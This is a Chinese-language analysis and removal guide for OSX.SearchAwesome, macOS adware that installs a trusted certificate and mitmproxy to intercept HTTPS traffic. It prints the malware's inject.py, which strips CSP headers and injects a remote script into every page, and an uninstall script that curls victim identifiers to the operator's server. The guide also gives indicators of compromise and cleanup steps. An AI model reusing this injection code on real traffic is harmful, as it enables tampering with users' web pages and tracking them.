OSX.SearchAwesome 恶意软件分析与防御指南

一、恶意软件概述

OSX.SearchAwesome 是一款针对 macOS 系统的广告注入恶意软件，能够拦截加密的 web 流量并进行中间人攻击(MitM)。该恶意软件通过伪装成正常图像文件进行传播，安装后会在受害者访问的每个网页中注入恶意脚本。

二、安装机制分析

1. 安装过程特征

• 伪装成普通图像文件，没有合法安装器的界面
• 采用静默安装方式，用户仅能看到两个认证请求：
  • 请求授权改变证书信任设置(Certificate Trust Settings)
  • 请求允许修改网络配置(SPI)

2. 安装组件

恶意软件会安装以下组件：

• /Applications/spi.app - 主程序
• ~/Library/LaunchAgents/spid-uninstall.plist - 卸载监控代理
• ~/Library/LaunchAgents/spid.plist - 启动代理

三、恶意行为分析

1. 持久化机制

• spid.plist 代理用于启动 spi.app
• 如果用户强制退出应用，需重启或重新登录才会再次启动

2. 自保护机制

• spid-uninstall.plist 监控 spi.app 的移除
• 当检测到主程序被删除时，会自动移除其他组件

3. 中间人攻击(MitM)实现

1. 证书安装：

   • 安装恶意证书，使系统信任攻击者
   • 获取 HTTPS 流量访问权限

2. 使用 mitmproxy：

   • 安装开源工具 mitmproxy 拦截、检查和修改 web 流量
   • 能够处理加密的 HTTPS 流量

4. 广告注入机制

通过 inject.py 脚本实现网页内容修改：

from mitmproxy import http

def response(flow: http.HTTPFlow) -> None:
    if flow.response.status_code == 200:
        if "text/html" in flow.response.headers["content-type"]:
            flow.response.headers.pop("content-security-policy", None)
            flow.response.headers.pop("content-security-policy-report-only", None)
            script_url = "https://chaumonttechnology.com/ia/script/d.php?uid=d7a477399cd589dcfe240e9f5c3398e2&a=3675&v=a1.0.0.25"
            html = flow.response.content
            html = html.decode().replace("</body>", "http://+script_url+</body>")
            flow.response.content = str(html).encode("utf8")

• 移除内容安全策略(CSP)头
• 在每个页面的 </body> 标签前注入恶意脚本

5. 卸载行为

当检测到主程序被移除时执行的脚本：

if ! [ -d "/Applications/spi.app" ]; then
    networksetup -setwebproxystate "Wi-Fi" off
    networksetup -setsecurewebproxystate "Wi-Fi" off
    networksetup -setwebproxystate "Ethernet" off
    networksetup -setsecurewebproxystate "Ethernet" off
    VERSION=$(defaults read com.searchpage.spi version)
    AID=$(defaults read com.searchpage.spi aid)
    UNIQUE_ID=$(defaults read com.searchpage.spi unique_id)
    curl "http://www.searchawesome.net/uninstall.php?un=1&v=$VERSION&reason=&unique_id=$UNIQUE_ID&aid=$AID"
    defaults delete com.searchpage.spi
    defaults delete com.searchpage.spiinstall
    rm ~/Library/LaunchAgents/spid-uninstall.plist
    rm ~/Library/LaunchAgents/spid.plist
fi

• 关闭代理设置
• 发送卸载信息到服务器
• 删除配置文件和启动代理

四、潜在危害

1. 当前威胁：

   • 广告注入影响用户体验
   • 隐私泄露风险

2. 未来可能威胁：

   • 重定向到钓鱼网站
   • 窃取用户数据
   • 加密货币挖矿
   • 键盘记录
   • 其他恶意代码注入

3. 残留风险：

   • 遗留的 MitM 工具可能被其他恶意软件利用
   • 未移除的 mitmproxy 组件

五、检测与清除指南

1. 感染指标(IoC)

检查系统中是否存在以下文件：

• /Applications/spi.app
• ~/Library/LaunchAgents/spid-uninstall.plist
• ~/Library/LaunchAgents/spid.plist
• ~/Library/SPI/
• ~/.mitmproxy/ (mitmproxy 安装标志)

2. 手动清除步骤

1. 移除主程序：

   rm -rf /Applications/spi.app
   

2. 删除启动代理：

   rm ~/Library/LaunchAgents/spid-uninstall.plist
   rm ~/Library/LaunchAgents/spid.plist
   

3. 清理 SPI 目录：

   rm -rf ~/Library/SPI/
   

4. 移除 mitmproxy 证书：

   • 打开"钥匙串访问"应用
   • 搜索并删除所有与 mitmproxy 相关的证书

5. 检查并重置网络设置：

   networksetup -setwebproxystate "Wi-Fi" off
   networksetup -setsecurewebproxystate "Wi-Fi" off
   networksetup -setwebproxystate "Ethernet" off
   networksetup -setsecurewebproxystate "Ethernet" off
   

6. 删除偏好设置：

   defaults delete com.searchpage.spi
   defaults delete com.searchpage.spiinstall
   

3. 安全建议

• 不要使用恶意软件提供的卸载服务
• 使用专业安全软件进行全面扫描
• 定期检查系统是否有异常行为
• 谨慎处理系统权限请求，特别是涉及证书和网络设置的请求

六、防御措施

1. 预防措施：

   • 仅从可信来源下载软件
   • 警惕伪装成图像或其他非可执行文件的应用程序
   • 注意系统权限请求，特别是证书和网络设置相关请求

2. 技术防护：

   • 启用防火墙和实时防护
   • 定期更新系统和安全软件
   • 使用内容安全策略(CSP)保护的浏览器

3. 监控措施：

   • 定期检查 /Library/LaunchAgents/ 和 ~/Library/LaunchAgents/ 目录
   • 监控网络流量异常
   • 检查浏览器中是否有未知证书

七、总结

OSX.SearchAwesome 是一款利用 MitM 技术进行广告注入的 macOS 恶意软件，其特点是：

• 伪装性强，安装过程隐蔽
• 使用合法开源工具 mitmproxy 实施攻击
• 能够绕过 HTTPS 加密
• 具有自保护和卸载机制
• 潜在危害大，可升级为更严重的威胁

用户应提高安全意识，采取多层防御措施，及时发现和处理此类威胁。